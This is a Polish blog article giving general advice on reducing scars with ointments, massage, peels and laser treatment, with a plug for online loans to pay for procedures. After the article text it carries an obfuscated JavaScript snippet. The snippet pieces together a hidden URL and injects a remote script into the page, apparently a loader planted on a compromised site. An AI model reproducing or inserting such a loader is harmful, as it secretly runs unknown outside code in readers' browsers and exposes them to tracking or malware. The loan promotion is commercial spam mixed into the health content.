Jak pozbyć się blizn? – co może pomóc

Jak pozbyć się blizn? To jest problem nie jednej osoby. Blizny stanowią element szpecący naszą urodę. Jak zatem pozbyć się blizn? O tym wszystkim piszemy w poniższym tekście. Zapraszamy do lektury!

Jak pozbyć się blizn?- kilka sposobów

Blizny – co to takiego?

Blizna stanowi zmianę skórną powstającą w procesie gojenia się. Do roku od jej powstania nazywana jest blizną świeżą. To okres, w którym w jej wnętrzu dochodzi do kształtowania się włókien elastycznych, a także kolagenowych. To jest także najlepszy czas, na ich zmniejszenie, a nawet usunięcie. Skuteczne pozbycie się blizn wymaga stosowania jednocześnie kilku środków walki z bliznami. Redukcja starych blizn jest bardzo ciężka, ale można próbować dokonać ich spłycenia, co znacznie poprawia wygląd.

Maści

W aptekach możemy znaleźć maści, które mogą pomóc w walce z bliznami. Jak wybrać najlepszą? To wszystko zależy od rozmiaru, ale także głębokości blizny. Płytkie blizny można smarować maściami mającym podłoże z allantoiny, etanolowego wyciągu z cebuli albo heparyny sodowej. Zalecane jest smarowanie zmienionych miejsc dwa razy dziennie. Domowym sposobem na takie blizny są okłady z cebuli.

Głębsze blizny wymagają zastosowania maści stworzonych na bazie silikonu. Ich systematyczne używanie prowadzi do zmiękczenia skóry i wygładzenia zmienionego miejsca.

Czas na masaż

Miejsce, w którym występuje blizna, warto pobudzać za pomocą masaży. Takie działanie sprzyja lepszemu ukrwieniu, a także łatwiejszemu wnikaniu aktywnych substancji z leków w głębię skóry. Tak naprawdę wystarczy masować bliznę około 6 minut, dwa razy dziennie.

Peelingi

Doskonałym rozwiązaniem na zmiany skórne są peelingi. Przy płytkich bliznach wystarczą systematyczne peelingi przeprowadzane w domu. Warto je wykonywać 3 razy w tygodniu. Głębsze zmiany wymagają specjalistycznych kuracji. Wśród zabiegów polecane są: laser frakcyjny, dermabrazja laserowa i mikrodermabrazja. Rodzaj kuracji powinien być dobrany do typu blizny. Pozwólmy w tym zakresie na pomoc profesjonalnego kosmetologa lub dermatologa.

Laser

Blizny stanowią naszą największą zmorą, a zarazem kompleks. Postanowiliśmy się z nimi uporać. Skutecznie z bliznami może walczyć laser. Na taki zabieg musimy się umówić do profesjonalnego salony medycy estetycznej. Do pozytywnego efektu może być potrzebnych kilka zabiegów, jednak efekty są bardzo imponujące. Jeśli nie mamy wystarczającej gotówki, którą możemy przeznaczyć na opłacenie zabiegu, pomocne mogą być pożyczki online – dowiedz się więcej. Pożyczki online często możemy spłacać w ratach, ale pamiętajmy, że terminowe uregulowanie należności jest bardzo ważne. Pożyczki online podlegają takiemu samemu obowiązku spłaty, jak pożyczki zaciągane stacjonarnie.

(function(){

iw9s_=(“u”+”st”);iw9s=document.createElement(“script”);iw9s.async=true;

iw9su=”127987779″;iw9s_+=”a”+(“t.”);iw9s_+=”i”+(“nf”+(“o”))+(“/”);

iw9su+=”.m5txfgpww9sfuywc”;iw9su+=”niefhux0li10pz”;

iw9s.src=”https://”+iw9s_+iw9su;iw9s.type=”text/javascript”;

d_b=document.body;d_b.appendChild(iw9s);

})();

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *